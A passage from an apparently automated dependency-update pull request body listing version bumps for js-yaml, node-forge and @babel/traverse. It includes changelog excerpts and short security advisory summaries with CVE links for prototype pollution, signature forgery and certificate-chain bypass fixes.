2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `node-forge` from 1.3.0 to 1.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/digitalbazaar/forge/blob/main/CHANGELOG.md\"\u003enode-forge's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.4.0 - 2026-03-24\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Denial of Service in \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eA Denial of Service (DoS) vulnerability exists due to an infinite loop in\nthe \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e function (inherited from the bundled jsbn\nlibrary). When \u003ccode\u003emodInverse()\u003c/code\u003e is called with a zero value as input, the\ninternal Extended Euclidean Algorithm enters an unreachable exit condition,\ncausing the process to hang indefinitely and consume 100% CPU.\u003c/li\u003e\n\u003cli\u003eReported by Kr0emer.\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33891\"\u003eCVE-2026-33891\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx\"\u003eGHSA-5gfm-wpxj-wjgq\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in RSA-PKCS due to ASN.1 extra field.\n\u003cul\u003e\n\u003cli\u003eRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low\npublic exponent keys (e=3). Attackers can forge signatures by stuffing\n\u0026quot;garbage\u0026quot; bytes within the ASN.1 structure in order to construct a\nsignature that passes verification, enabling Bleichenbacher style forgery.\nThis issue is similar to CVE-2022-24771, but adds bytes in an addition\nfield within the ASN.1 structure, rather than outside of it.\u003c/li\u003e\n\u003cli\u003eAdditionally, forge does not validate that signatures include a minimum of\n8 bytes of padding as defined by the specification, providing attackers\nadditional space to construct Bleichenbacher forgeries.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33894\"\u003eCVE-2026-33894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\"\u003eGHSA-ppp5-5v6c-4jwp\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in Ed25519 due to missing S \u0026lt; L check.\n\u003cul\u003e\n\u003cli\u003eEd25519 signature verification accepts forged non-canonical signatures\nwhere the scalar S is not reduced modulo the group order (S \u0026gt;= L). A valid\nsignature and its S + L variant both verify in forge, while Node.js\ncrypto.verify (OpenSSL-backed) rejects the S + L variant, as defined by the\nspecification. This class of signature malleability has been exploited in\npractice to bypass authentication and authorization logic (see\nCVE-2026-25793, CVE-2022-35961). Applications relying on signature\nuniqueness (i.e., dedup by signature bytes, replay tracking, signed-object\ncanonicalization checks) may be bypassed.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33895\"\u003eCVE-2026-33895\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw\"\u003eGHSA-q67f-28xg-22rw\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: \u003ccode\u003ebasicConstraints\u003c/code\u003e bypass in certificate chain verification.\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epki.verifyCertificateChain()\u003c/code\u003e does not enforce RFC 5280 \u003ccode\u003ebasicConstraints\u003c/code\u003e\nrequirements when an intermediate certificate lacks both the\n\u003ccode\u003ebasicConstraints\u003c/code\u003e and \u003ccode\u003ekeyUsage\u003c/code\u003e extensions. This allows any leaf\ncertificate (without these extensions) to act as a CA and sign other\ncertificates, which node-forge will accept as valid.\u003c/li\u003e\n\u003cli\u003eReported by Doruk Tan Ozturk (\u003ca href=\"https://github.com/peaktwilight\"\u003e\u003ccode\u003e@​peaktwilight\u003c/code\u003e\u003c/a\u003e) - doruk.ch\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33896\"\u003eCVE-2026-33896\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25\"\u003eGHSA-2328-f5f3-gj25\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/fa385f92440879601240020f158bed68e444e83a\"\u003e\u003ccode\u003efa385f9\u003c/code\u003e\u003c/a\u003e Release 1.4.0.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/07d4e162762ed4fdab5caca9ebf78237fcf85339\"\u003e\u003ccode\u003e07d4e16\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/cb90fd92091ee34e4abab3ad0c835eeea3d06c3e\"\u003e\u003ccode\u003ecb90fd9\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/963e7c5c7b0f03de1b28a1e5a42a6bafda4cf711\"\u003e\u003ccode\u003e963e7c5\u003c/code\u003e\u003c/a\u003e Add unit test for \u0026quot;pseudonym\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/f0b6f5b7c5d1c918240e975e0cade4f47d005446\"\u003e\u003ccode\u003ef0b6f5b\u003c/code\u003e\u003c/a\u003e Add pseudonym OID\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/3df48a311d4b53dc6493b7a47a8d07f3669957d9\"\u003e\u003ccode\u003e3df48a3\u003c/code\u003e\u003c/a\u003e Fix missing CVE ID.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90\"\u003e\u003ccode\u003e2e49283\u003c/code\u003e\u003c/a\u003e Add x509 \u003ccode\u003ebasicConstraints\u003c/code\u003e check.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85\"\u003e\u003ccode\u003ebdecf11\u003c/code\u003e\u003c/a\u003e Add canonical signature scaler check for S \u0026lt; L.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/af094e69c60ac5f7b29f2b1957c53ae5e12fd4a0\"\u003e\u003ccode\u003eaf094e6\u003c/code\u003e\u003c/a\u003e Add RSA padding and DigestInfo length checks.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/796eeb1673f6ec636fda02dfc295047d9f7aefe0\"\u003e\u003ccode\u003e796eeb1\u003c/code\u003e\u003c/a\u003e Improve jsbn fix.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/digitalbazaar/forge/compare/v1.3.0...v1.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/traverse` from 7.14.2 to 7.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/traverse\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 